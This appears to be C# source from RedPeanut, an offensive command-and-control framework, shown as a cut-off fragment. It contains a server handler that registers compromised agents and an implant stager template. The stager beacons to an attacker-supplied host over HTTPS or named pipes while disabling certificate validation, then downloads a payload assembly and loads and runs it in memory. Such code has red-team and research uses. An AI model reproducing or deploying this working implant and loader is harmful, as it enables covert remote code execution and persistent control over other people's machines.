private ActionResult StepOne(StreamReader reader)
{
AgentIdReqMsg agentidrequest = null;
try
{
string line_t = reader.ReadToEnd();
Dictionary <string, string> args = GetParsedArgs(line_t);
var line = DecryptMessage(RedPeanutC2.server.GetServerKey(), args.GetValueOrDefault(Paramname));
agentidrequest = JsonConvert.DeserializeObject <AgentIdReqMsg>(line);
}
catch (Exception)
{
// Someting goes wrong decrypting or deserializing message return not found
Console.WriteLine("[x] Something goes wrong decrypting or deserializing message return not found");
Program.GetMenuStack().Peek().RePrintCLI();
httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
return(NotFound());
}
try
{
IAgentInstance agent = new AgentInstanceHttp(RedPeanutC2.server, RandomString(10, RedPeanutC2.server.GetRandomObject()), RedPeanutC2.server.GetServerKey(), agentidrequest.address, agentidrequest.port, agentidrequest.framework, Profileid);
//If agentidreq come from a pivoter set the prop
if (!string.IsNullOrEmpty(agentidrequest.AgentPivot))
{
IAgentInstance agentInstance = RedPeanutC2.server.GetAgent(agentidrequest.AgentPivot);
agent.Pivoter = agentInstance;
}
RedPeanutC2.server.RegisterAgentInbound(agent.AgentId, agent);
string response = CreateMsgAgentId(agent, RedPeanutC2.server.GetServerKey(), Profileid, agentidrequest.framework);
//Set cookie
SetCookieValue("sessionid", EncryptMessage(RedPeanutC2.server.GetServerKey(), agent.AgentId), 0);
Console.WriteLine("\n[*] Agent {0} connected", agent.AgentId);
Program.GetMenuStack().Peek().RePrintCLI();
return(Ok(response));
}
catch (Exception e)
{
// Operation error
Console.WriteLine("[x] Operation error {0}", e.Message);
Program.GetMenuStack().Peek().RePrintCLI();
httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
return(NotFound());
}
}
public static void Execute()
{
string[] pageget =
{
#PAGEGET #
};
string[] pagepost =
{
#PAGEPOST #
};
string param = "#PARAM#";
string serverkey = "#SERVERKEY#";
string host = "#HOST#";
string namedpipe = "#PIPENAME#";
int port = 0;
int targetframework = 40;
Int32.TryParse("#PORT#", out port);
Int32.TryParse("#FRAMEWORK#", out targetframework);
Thread.Sleep(10000);
AgentIdReqMsg agentIdReqMsg = new AgentIdReqMsg();
agentIdReqMsg.address = host;
agentIdReqMsg.port = port;
agentIdReqMsg.request = "agentid";
agentIdReqMsg.framework = targetframework;
string agentidrequesttemplate = new JavaScriptSerializer().Serialize(agentIdReqMsg);
bool agentexit = false;
while (true && !agentexit)
{
try
{
string resp = "";
string cookievalue = "";
NamedPipeClientStream pipe = null;
if (string.IsNullOrEmpty(namedpipe))
{
CookiedWebClient wc = new CookiedWebClient();
wc.UseDefaultCredentials = true;
wc.Proxy = WebRequest.DefaultWebProxy;
wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
WebHeaderCollection webHeaderCollection = new WebHeaderCollection();
webHeaderCollection.Add(HttpRequestHeader.UserAgent, "#USERAGENT#");
#HEADERS #
wc.Headers = webHeaderCollection;
ServicePointManager.Expect100Continue = true;
ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072;
ServicePointManager.DefaultConnectionLimit = 9999;
ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(delegate { return(true); });
string post = String.Format("{0}={1}", param, EncryptMessage(serverkey, agentidrequesttemplate));
string rpaddress = String.Format("https://{0}:{1}/{2}", host, port, pagepost[new Random().Next(pagepost.Length)], post);
resp = wc.UploadString(rpaddress, post);
Cookie cookie = wc.ResponseCookies["sessionid"];
cookievalue = cookie.Value;
}
else
{
try
{
pipe = new NamedPipeClientStream(host, namedpipe, PipeDirection.InOut, PipeOptions.Asynchronous);
pipe.Connect(5000);
pipe.ReadMode = PipeTransmissionMode.Message;
//Write AgentIdReqMsg
var agentIdrequest = EncryptMessage(serverkey, agentidrequesttemplate);
pipe.Write(Encoding.Default.GetBytes(agentIdrequest), 0, agentIdrequest.Length);
var messageBytes = ReadMessage(pipe);
resp = Encoding.UTF8.GetString(messageBytes);
}
catch (Exception)
{
}
}
var line = DecryptMessage(serverkey, resp);
AgentIdMsg agentIdMsg = new JavaScriptSerializer().Deserialize <AgentIdMsg>(line);
object[] agrsstage = new object[] {
line, cookievalue, pipe
};
System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(getPayload(agentIdMsg.stage));
assembly.GetTypes()[0].GetMethods()[0].Invoke(null, agrsstage);
}
